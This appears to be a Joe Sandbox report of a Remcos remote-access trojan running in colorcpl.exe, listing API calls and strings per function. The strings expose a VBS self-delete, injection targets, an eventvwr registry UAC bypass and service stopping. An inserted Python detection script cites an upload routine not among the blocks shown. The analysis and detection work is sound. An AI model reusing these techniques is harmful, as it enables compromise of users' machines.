                                                              • Opcode Fuzzy Hash: f9f5e0c9969aa2191cbfc4de4da6e4eecd5dbe6aeb336bb2058597d6f645925c
                                                              • Instruction Fuzzy Hash: F6B1E23560A344AFEB58FB64C890BEFB7E9AFC4610F40491EF4895B290EF309905DB42
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,03102248,03101FFC,?,00000001), ref: 0309DE4E
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000001), ref: 0309DE79
                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0309DE95
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0309DF14
                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0309DF23
                                                                • Part of subcall function 030A9F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 030A9F9C
                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 0309E047
                                                              • CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 0309E133
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                                                              • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                              • API String ID: 193334293-1743721670
                                                              • Opcode ID: dcc142cd2a14d232938beee231b6fbb931da061e33f41b5e4818e72759c4541a
                                                              • Instruction ID: 2e98d3ce0edd607114437e7239a014d691f301e4a870e852bcc3edb1e094486c
                                                              • Opcode Fuzzy Hash: dcc142cd2a14d232938beee231b6fbb931da061e33f41b5e4818e72759c4541a
                                                              • Instruction Fuzzy Hash: FE81403420A3459FEE58FBA0D860EEFB7E8AFD4640F40091EE5864B1A1EF31994DD752
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: da97825020658e4fc55bc3ac3d76ad825c1a5a17e5a84147288e8a8f640c8c2b
                                                              • Instruction ID: a99dc484122b80062a21247377daf2bbfbcb072d4e50fc5719ce56bbb5ce2f8d
                                                              • Opcode Fuzzy Hash: da97825020658e4fc55bc3ac3d76ad825c1a5a17e5a84147288e8a8f640c8c2b
                                                              • Instruction Fuzzy Hash: 10C15676E41304AFDB20DBA8CC42FEEB7F8EF48715F154155FA48EB281D67099458B60
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 030A18B2
                                                                • Part of subcall function 030A9959: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,030F9654,0309BDCB,.vbs,?,?,?,?,?,03102200), ref: 030A9980
                                                                • Part of subcall function 030A68A6: CloseHandle.KERNEL32(030940D5,?,?,030940D5,030F2E24), ref: 030A68BC
                                                                • Part of subcall function 030A68A6: CloseHandle.KERNEL32(030F2E24,?,?,030940D5,030F2E24), ref: 030A68C5
                                                              • Sleep.KERNEL32(0000000A,030F2E24), ref: 030A1A01
                                                              • Sleep.KERNEL32(0000000A,030F2E24,030F2E24), ref: 030A1AA3
                                                              • Sleep.KERNEL32(0000000A,030F2E24,030F2E24,030F2E24), ref: 030A1B42
                                                              • DeleteFileW.KERNEL32(00000000,030F2E24,030F2E24,030F2E24), ref: 030A1B9F
                                                              • DeleteFileW.KERNEL32(00000000,030F2E24,030F2E24,030F2E24), ref: 030A1BCF
                                                              • DeleteFileW.KERNEL32(00000000,030F2E24,030F2E24,030F2E24), ref: 030A1C05
                                                              • Sleep.KERNEL32(000001F4,030F2E24,030F2E24,030F2E24), ref: 030A1C25
                                                              • Sleep.KERNEL32(00000064), ref: 030A1C63
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcess
                                                              • String ID: /stext "
                                                              • API String ID: 2485855082-3856184850
                                                              • Opcode ID: c3885dff7e9b6b4c06ddb9dc271b0622a1ae1a110e73682124e65bcf715e60eb
                                                              • Instruction ID: 2321b05af6a664cc90a7c3bb6cc3eb8d3c8ce56277ebc31170ef9c4bae299fba
                                                              • Opcode Fuzzy Hash: c3885dff7e9b6b4c06ddb9dc271b0622a1ae1a110e73682124e65bcf715e60eb
                                                              • Instruction Fuzzy Hash: C7F1233560A3455FEB2DFBA4D8A0BEFB3D5AFD4200F50091EE08A4A191EF709A4DD652
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 65535$udp
                                                              • API String ID: 0-1267037602
                                                              • Opcode ID: 1a0beb9d2260414baff93e862da0165526b5ff0540b9b889965a749ab1dd6acc
                                                              • Instruction ID: 1b7377a0b6987c433e55bb84ac935da2581758e54dcfbaca311d0ab90757bc4f
                                                              • Opcode Fuzzy Hash: 1a0beb9d2260414baff93e862da0165526b5ff0540b9b889965a749ab1dd6acc
                                                              • Instruction Fuzzy Hash: 9651D8BD607B059BD7B0DA9CF449B7FB7D4AF84A81F0C49ADF8819A680D725C8408A52
                                                              APIs
                                                                • Part of subcall function 030A12B5: TerminateProcess.KERNEL32(00000000,031021E8,0309E2B2), ref: 030A12C5
                                                                • Part of subcall function 030A12B5: WaitForSingleObject.KERNEL32(000000FF), ref: 030A12D8
                                                                • Part of subcall function 030A20E8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,03102200), ref: 030A2104
                                                                • Part of subcall function 030A20E8: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 030A211D
                                                                • Part of subcall function 030A20E8: RegCloseKey.KERNEL32(00000000), ref: 030A2128
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0309C412
                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,030F9654,030F9654,00000000), ref: 0309C571
                                                              • ExitProcess.KERNEL32 ref: 0309C57D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                              • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                              • API String ID: 1913171305-2411266221
                                                              • Opcode ID: b05d88e61a9d775c53edb9d77b485eccf4e15da7feb9e40e3aab4616002737b3
                                                              • Instruction ID: 57aa8d7d83a78e55cd509a3bdafa807bfd941da0494d45cc89280d5b7f199e28
                                                              • Opcode Fuzzy Hash: b05d88e61a9d775c53edb9d77b485eccf4e15da7feb9e40e3aab4616002737b3
                                                              • Instruction Fuzzy Hash: 43414E39A122196FEF18F7A5DC64DEE7779AF94610F00016BE106AF091EF305E4ADA90
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,03091D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 030C8632
                                                              • GetLastError.KERNEL32(?,?,03091D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 030C863F
                                                              • __dosmaperr.LIBCMT ref: 030C8646
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,03091D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 030C8672
                                                              • GetLastError.KERNEL32(?,?,?,03091D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 030C867C
                                                              • __dosmaperr.LIBCMT ref: 030C8683
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,03091D35,?), ref: 030C86C6
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,03091D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 030C86D0
                                                              • __dosmaperr.LIBCMT ref: 030C86D7
                                                              • _free.LIBCMT ref: 030C86E3
                                                              • _free.LIBCMT ref: 030C86EA
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                              • String ID:
                                                              • API String ID: 2441525078-0
                                                              • Opcode ID: ccaacae7d47af187c8d88dd90e7d8304bb4aadd6c11cb554e00c1bfc127e542c
                                                              • Instruction ID: 0e215005218fdef5e682997e413fa3606f6d1ae8c76f8ffae9d086064d3ef972
                                                              • Opcode Fuzzy Hash: ccaacae7d47af187c8d88dd90e7d8304bb4aadd6c11cb554e00c1bfc127e542c
                                                              • Instruction Fuzzy Hash: 7A31C27991238EBFCF11EFA4DC489AF7BA8EF44760B14815DF8115A250DB35C910CB65
                                                              APIs
                                                              • SetEvent.KERNEL32(?,?), ref: 0309549F
                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0309554F
                                                              • TranslateMessage.USER32(?), ref: 0309555E
                                                              • DispatchMessageA.USER32(?), ref: 03095569
                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,03101F10), ref: 03095621
                                                              • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 03095659
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Message$Heap$CreateDispatchEventFreeTranslate
                                                              • String ID: CloseChat$DisplayMessage$GetMessage
                                                              • API String ID: 2460878853-749203953
                                                              • Opcode ID: a076877d64bceb6518960a7c7f0c45c5358c2d04d4925ee681675eaf7d998e5a
                                                              • Instruction ID: ea1293e43f9e6a5c6bc300fb0b8ba5c0c0cf27f9293c073c907c042386851bce
                                                              • Opcode Fuzzy Hash: a076877d64bceb6518960a7c7f0c45c5358c2d04d4925ee681675eaf7d998e5a
                                                              • Instruction Fuzzy Hash: BF410479A063056FEF04FB75DC648AF7BE9ABC5610F00091EF5428B691DF348A05D751
                                                              APIs
                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,030A843C,00000000), ref: 030A8AD2
                                                              • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,030A843C,00000000), ref: 030A8AE9
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,030A843C,00000000), ref: 030A8AF6
                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,030A843C,00000000), ref: 030A8B05
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,030A843C,00000000), ref: 030A8B16
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,030A843C,00000000), ref: 030A8B19
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                              • String ID:
                                                              • API String ID: 221034970-0
                                                              • Opcode ID: 75ee2c3f00dedd2aa541cf77ac7809ec83d2d3fe6ac79b112e83c94495de122c
                                                              • Instruction ID: 8c2933385591efe005ac80d733c6614719c12872904d07efc27f8249f61aae9c
                                                              • Opcode Fuzzy Hash: 75ee2c3f00dedd2aa541cf77ac7809ec83d2d3fe6ac79b112e83c94495de122c
                                                              • Instruction Fuzzy Hash: DF112571B0312C6FD610FBA8FC89DBF3FACDF52AA27000056FA059A140DB294C059AB1
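Four of the function blocks above describe Remcos behaviour directly in their API and string listings: the CreateFileW/GetFileSizeEx/ReadFile routine with the string "Uploading file to Controller:", the CreateToolhelp32Snapshot/Process32FirstW/Process32NextW walk with "Inj", "ieinstal.exe" and "ielowutil.exe", the ShellExecuteW launch of a dropped .vbs that deletes Wscript.ScriptFullName, and the OpenSCManagerW/OpenServiceW/ControlService sequence whose second ControlService argument is 00000001 (SERVICE_CONTROL_STOP in the Win32 service API). The Python below is an added triage example and is not code from this Joe Sandbox report or from the analysed sample: it parses the listing format used on this page (API lines with "ref:", the "$"-joined "String ID" line, the Instruction Fuzzy Hash line that closes each block) and flags blocks matching those four behaviours. The rule names, the helper names and the SAMPLE text are constructed for the example; SAMPLE is assembled from lines of the blocks above, and "Part of subcall function" entries are deliberately counted toward a function's API set, since that is how OpenProcess appears in the injection-target block.

```python
"""Triage helper for Joe Sandbox per-function API listings (added example, not
code from the report or the sample). It parses the "• Api.Module(args), ref: addr"
and "• String ID: a$b$c" lines used above and flags functions whose API set plus
strings match the Remcos behaviours shown on this page."""
import re
from dataclasses import dataclass, field

# "Part of subcall function" entries are APIs reached through a callee and count
# toward the function's API set.  Every block ends with its Instruction Fuzzy Hash.
API_LINE = re.compile(r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?(?P<api>\w+)\.\w+"
                      r"(?:\((?P<args>.*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
STRING_ID = re.compile(r"^\s*•\s*String ID:\s*(?P<strings>.*)$")   # strings joined by '$'
BLOCK_END = re.compile(r"^\s*•\s*Instruction Fuzzy Hash:")

@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)    # (api, [args], ref) tuples
    strings: list = field(default_factory=list)

    def apis(self):
        return {api for api, _, _ in self.calls}

def parse_blocks(text):
    """Split report text into one FunctionBlock per function."""
    blocks, cur = [], FunctionBlock()
    for line in text.splitlines():
        if m := API_LINE.match(line):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append((m["api"], args, m["ref"]))
        elif m := STRING_ID.match(line):
            cur.strings = [s for s in m["strings"].split("$") if s]
        elif BLOCK_END.match(line):
            blocks.append(cur)
            cur = FunctionBlock()
    if cur.calls or cur.strings:           # listing truncated before its hash line
        blocks.append(cur)
    return blocks

def _control_stop(block):
    # ControlService's second argument is dwControl; 00000001 is SERVICE_CONTROL_STOP.
    return any(api == "ControlService" and len(args) > 1 and args[1] == "00000001"
               for api, args, _ in block.calls)

# (finding, APIs that must all appear, substrings of which one must appear, extra check).
# Rule names are mine; each rule mirrors one function block visible on this page.
RULES = [
    ("self-delete via dropped .vbs run through cmd /c",
     {"GetModuleFileNameW", "ShellExecuteW"},
     ("Scripting.FileSystemObject", "Wscript.ScriptFullName"), None),
    ("process walk selecting an injection target",
     {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW", "OpenProcess"},
     ("Inj", "ieinstal.exe", "ielowutil.exe"), None),
    ("local file read for upload to the controller",
     {"CreateFileW", "GetFileSizeEx", "ReadFile"}, ("Uploading file to Controller:",), None),
    ("service stop through the SCM",
     {"OpenSCManagerW", "OpenServiceW", "ControlService"}, (), _control_stop),
]

def triage(blocks):
    """Return (block index, finding) for every rule a block satisfies."""
    findings = []
    for i, b in enumerate(blocks):
        for finding, apis, needles, check in RULES:
            if (apis <= b.apis()
                    and (not needles or any(n in s for s in b.strings for n in needles))
                    and (check is None or check(b))):
                findings.append((i, finding))
    return findings

# Constructed input in the report's own format, assembled from lines of the blocks above.
SAMPLE = r'''• CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 03097D1F
• GetFileSizeEx.KERNEL32(00000000,?), ref: 03097D57
• ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 03097EC7
• String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
• Instruction Fuzzy Hash: F6B1E23560A344AFEB58FB64C890BEFB7E9AFC4610F40491EF4895B290EF309905DB42
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000001), ref: 0309DE79
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 0309DE95
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0309DF14
  • Part of subcall function 030A9F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 030A9F9C
• String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
• Instruction Fuzzy Hash: FE81403420A3459FEE58FBA0D860EEFB7E8AFD4640F40091EE5864B1A1EF31994DD752
• GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0309C412
• ShellExecuteW.SHELL32(00000000,open,00000000,030F9654,030F9654,00000000), ref: 0309C571
• ExitProcess.KERNEL32 ref: 0309C57D
• String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
• Instruction Fuzzy Hash: 43414E39A122196FEF18F7A5DC64DEE7779AF94610F00016BE106AF091EF305E4ADA90
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,030A843C,00000000), ref: 030A8AD2
• OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,030A843C,00000000), ref: 030A8AE9
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,030A843C,00000000), ref: 030A8B05
• Instruction Fuzzy Hash: DF112571B0312C6FD610FBA8FC89DBF3FACDF52AA27000056FA059A140DB294C059AB1
• _free.LIBCMT ref: 030D5645
  • Part of subcall function 030D3C92: RtlFreeHeap.NTDLL(00000000,00000000,?,030DDE4F,?,00000000,?,00000000,?,030DE0F3,?,00000007,?,?,030DE63E,?), ref: 030D3CA8
• Instruction Fuzzy Hash: 2211A77D20230CAFCB01EF54C844EDD3BA5FF44391B029495BA884F121EA31DA509F91'''

if __name__ == "__main__":
    for idx, finding in triage(parse_blocks(SAMPLE)):
        print(f"function block {idx}: {finding}")
```

The parser only reacts to API, String ID and Instruction Fuzzy Hash lines, so the Memory Dump Source, Opcode ID and Similarity lines of a full report export pass through unchanged and the same code runs over the whole page. The last SAMPLE block, a CRT _free wrapper that only reaches RtlFreeHeap, is included to show that library-cleanup functions produce no finding; a rule that matched on a single API such as CloseHandle or Sleep would fire on nearly every block and is deliberately absent.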
                                                              APIs
                                                              • _free.LIBCMT ref: 030D5645
                                                                • Part of subcall function 030D3C92: RtlFreeHeap.NTDLL(00000000,00000000,?,030DDE4F,?,00000000,?,00000000,?,030DE0F3,?,00000007,?,?,030DE63E,?), ref: 030D3CA8
                                                                • Part of subcall function 030D3C92: GetLastError.KERNEL32(?,?,030DDE4F,?,00000000,?,00000000,?,030DE0F3,?,00000007,?,?,030DE63E,?,?), ref: 030D3CBA
                                                              • _free.LIBCMT ref: 030D5651
                                                              • _free.LIBCMT ref: 030D565C
                                                              • _free.LIBCMT ref: 030D5667
                                                              • _free.LIBCMT ref: 030D5672
                                                              • _free.LIBCMT ref: 030D567D
                                                              • _free.LIBCMT ref: 030D5688
                                                              • _free.LIBCMT ref: 030D5693
                                                              • _free.LIBCMT ref: 030D569E
                                                              • _free.LIBCMT ref: 030D56AC
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 350552d9552a2a8299357a19205bfba92709b851e853bae24b67572efcd50b80
                                                              • Instruction ID: d486db81709bcaff33278a278d68278191bdeba082fc67d6b53b43a4c3550bad
                                                              • Instruction Fuzzy Hash: 2211A77D20230CAFCB01EF54C844EDD3BA5FF44391B029495BA884F121EA31DA509F91
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 030A7F6F
                                                              • GdiplusStartup.GDIPLUS(03101668,?,00000000), ref: 030A7FA1
                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 030A802D
                                                              • Sleep.KERNEL32(000003E8), ref: 030A80B3
                                                              • GetLocalTime.KERNEL32(?), ref: 030A80BB
                                                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 030A81AA
                                                               Memory Dump Source
                                                               • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                               Joe Sandbox IDA Plugin
                                                               • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                              • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                              • API String ID: 489098229-3790400642
                                                              • Opcode ID: e7bfd54fc91e23bc2ef1acf82340829bf78584c1ab704f8af1cce613a1a49215
                                                              • Instruction ID: 27735dd0a1a398efe5067305ed0565bc099be39f0fe6763f0c7d921ce8f6afde
                                                              • Instruction Fuzzy Hash: 17516C75A023599FEF58FBF8D864AFD7BA8AF94200F04046AE405AF180EF749E45D790
                                                              APIs
                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,030E41DF), ref: 030E3107
                                                               Memory Dump Source
                                                               • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                               Joe Sandbox IDA Plugin
                                                               • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              • API ID: DecodePointer
                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                              • API String ID: 3527080286-3064271455
                                                              • Opcode ID: aaf196b974c9f62695b5bdcbb8aafb92093553953400d47492ed76f9581f8665
                                                              • Instruction ID: a8fdc2b82a92795db634afde306620e936672c6ea016ab91b8213206b9790fd1
                                                              • Instruction Fuzzy Hash: 24515779B0260ADFCF44DFA8EA485ACBFF4FB49310F5445C9D481AB654CB369A248B18
                                                              APIs
                                                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 030A5A1A
                                                                • Part of subcall function 030AA20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,030A5A44), ref: 030AA228
                                                              • Sleep.KERNEL32(00000064), ref: 030A5A46
                                                              • DeleteFileW.KERNEL32(00000000), ref: 030A5A7A
                                                               Memory Dump Source
                                                               • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                               Joe Sandbox IDA Plugin
                                                               • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              • API ID: File$CreateDeleteExecuteShellSleep
                                                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                              • API String ID: 1462127192-2001430897
                                                              • Opcode ID: 89042844ea69c012f879509e63a0fc77e1d89c723a44a4c2729b90cb107ed66e
                                                              • Instruction ID: c959f07cd39d7bf5aa9877836fa4e600e3befaf0fecdab9036ea9ab6b21d27b7
                                                              • Instruction Fuzzy Hash: 44319635A433095FEF08FBA4ECA1EFE7738EFA0614F40016AE5066B191EF61594ADA50
                                                              APIs
                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,030F9654,030F9654,00000000), ref: 03096775
                                                              • ExitProcess.KERNEL32 ref: 03096782
                                                               Memory Dump Source
                                                               • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                               Joe Sandbox IDA Plugin
                                                               • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              • API ID: ExecuteExitProcessShell
                                                              • String ID: C:\Windows\SysWOW64\colorcpl.exe$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                                              • API String ID: 1124553745-2519146888
                                                              • Opcode ID: cb2ed4b98d4c8997c37937b558a329165dd5168a480b7f9b0aa7d5012bf6adb9
                                                              • Instruction ID: 97596e111b9ee46ec9844db2db6fd3e51e2f4b1c36166bc5c0f4008b72bd2af2
                                                              • Instruction Fuzzy Hash: 9A112739B473097FFE08F2A4DC66FEF32689B94620F00045BF616AE1C1DF6119058395
                                                              APIs
                                                              • AllocConsole.KERNEL32(00000000), ref: 030AAA5D
                                                              • ShowWindow.USER32(00000000,00000000), ref: 030AAA76
                                                               Memory Dump Source
                                                               • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                               Joe Sandbox IDA Plugin
                                                               • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              • API ID: AllocConsoleShowWindow
                                                              • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
                                                              • API String ID: 4118500197-4025029772
                                                              • Opcode ID: 8fa24124e20603d038b82d97493a5eb258d152386ea69792aa7437077fde93a0
                                                              • Instruction ID: 769025ca3338d80734ad8ba39f3a1f47345b66d8aa3f57c337c1a0d48b2b3442
                                                              • Instruction Fuzzy Hash: 86016DB6A9235DAEDB10FBF4AC45FDE77ACBB45B05F040419B210EE445DBA891088B61
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 030AB22B
                                                                • Part of subcall function 030AB2C4: RegisterClassExA.USER32(00000030), ref: 030AB310
                                                                • Part of subcall function 030AB2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 030AB32B
                                                                • Part of subcall function 030AB2C4: GetLastError.KERNEL32 ref: 030AB335
                                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 030AB262
                                                              • lstrcpynA.KERNEL32(03101AF8,Remcos,00000080), ref: 030AB27C
                                                              • Shell_NotifyIconA.SHELL32(00000000,03101AE0), ref: 030AB292
                                                              • TranslateMessage.USER32(?), ref: 030AB29E
                                                              • DispatchMessageA.USER32(?), ref: 030AB2A8
                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 030AB2B5
                                                               Memory Dump Source
                                                               • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                               Joe Sandbox IDA Plugin
                                                               • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                              • String ID: Remcos
                                                              • API String ID: 1970332568-165870891
